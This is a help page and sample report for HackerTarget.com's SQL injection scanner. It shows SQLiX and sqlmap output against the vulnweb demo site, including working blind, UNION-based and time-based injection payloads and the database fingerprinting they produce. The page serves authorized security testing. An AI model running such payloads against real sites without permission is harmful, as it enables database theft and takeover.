SQL Injection Test Help and Sample Report for HackerTarget.com

Entering a web address into the form will have that url scanned by one of our external servers for HTTP GET based sql injection. This type of vulnerability could allow backend database manipulation, access to customer data or even operating system access. A url with parameters at the end is the type of url tested by this scan:
For example: www.example.com?id=2&page=2
This url will have the parameter's id and page tested for sql injection.

You must enter a public website address that is routable from an external perspective and one that you have permission to scan. The results will be emailed to you once the scan has completed.

It is possible though highly unlikely that this scan could cause listening services to become unstable. It will also generate a great of noise in the web logs of the server, as it will perform multiple sql tests against each parameter using both Sqlmap and SQLiX tools.

The following is a sample sql injection report

HackerTarget.com - SQL Injection Test Sample Report

======================================================
-- SQLiX --
© Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URL [http://testphp.vulnweb.com/artists.php?artist=1]
http://testphp.vulnweb.com/artists.php?artist=1
[+] working on artist
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[ERROR] Parameter doesn't impact content
[+] Method: SQL Blind Integer Injection
[FOUND] Blind SQL Injection: Integer based
[FOUND] Database type: MySQL Server
[INFO] Current function: version()
[INFO] length: 31

5.0____________________________
5.0________________________-log
5.0____Debian______________-log
5.0.___Debian______________-log
5.0.2__Debian______________-log
5.0.22_Debian______________-log
5.0.22-Debian______________-log
5.0.22-Debian______________-log
5.0.22-Debian_0____________-log
5.0.22-Debian_0u___________-log
5.0.22-Debian_0ub__________-log
5.0.22-Debian_0ubu_________-log
5.0.22-Debian_0ubun________-log
5.0.22-Debian_0ubunt_______-log
5.0.22-Debian_0ubuntu______-log
5.0.22-Debian_0ubuntu6_____-log
5.0.22-Debian_0ubuntu6.____-log
5.0.22-Debian_0ubuntu6.0___-log
5.0.22-Debian_0ubuntu6.06__-log
5.0.22-Debian_0ubuntu6.06._-log
5.0.22-Debian_0ubuntu6.06.6-log

[FOUND] SQL Blind Integer Injection
--- No results here means that SQLiX found no injection point ---

--- Now sqlmap will test your url ---

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 09:04:35

[09:04:36] [INFO] using '/opt/sqlmap/output/testphp.vulnweb.com/session' as session file
[09:04:36] [INFO] testing connection to the target url
[09:04:37] [INFO] testing if the url is stable, wait a few seconds
[09:04:38] [INFO] url is stable
[09:04:38] [INFO] testing if GET parameter 'artist' is dynamic
[09:04:38] [INFO] confirming that GET parameter 'artist' is dynamic
[09:04:39] [INFO] GET parameter 'artist' is dynamic
[09:04:39] [INFO] heuristic test shows that GET parameter 'artist' might be injectable (possible DBMS: MySQL)
[09:04:39] [INFO] testing sql injection on GET parameter 'artist'
[09:04:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:04:40] [INFO] GET parameter 'artist' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:04:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:04:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:04:52] [INFO] GET parameter 'artist' is 'MySQL > 5.0.11 AND time-based blind' injectable
[09:04:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:04:55] [INFO] target url appears to be UNION injectable with 3 columns
[09:04:56] [INFO] GET parameter 'artist' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: artist
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=2 AND 683=683

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: artist=-743 UNION ALL SELECT NULL, CONCAT(CHAR(58,105,117,110,58),IFNULL(CAST(CHAR(67,106,71,66,118,97,119,68,106,119) AS CHAR),CHAR(32)),CHAR(58,100,107,122,58)), NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: artist=2 AND SLEEP(5)
---

[09:05:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0.11
[09:05:16] [INFO] Fetched data logged to text files under '/opt/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 09:05:16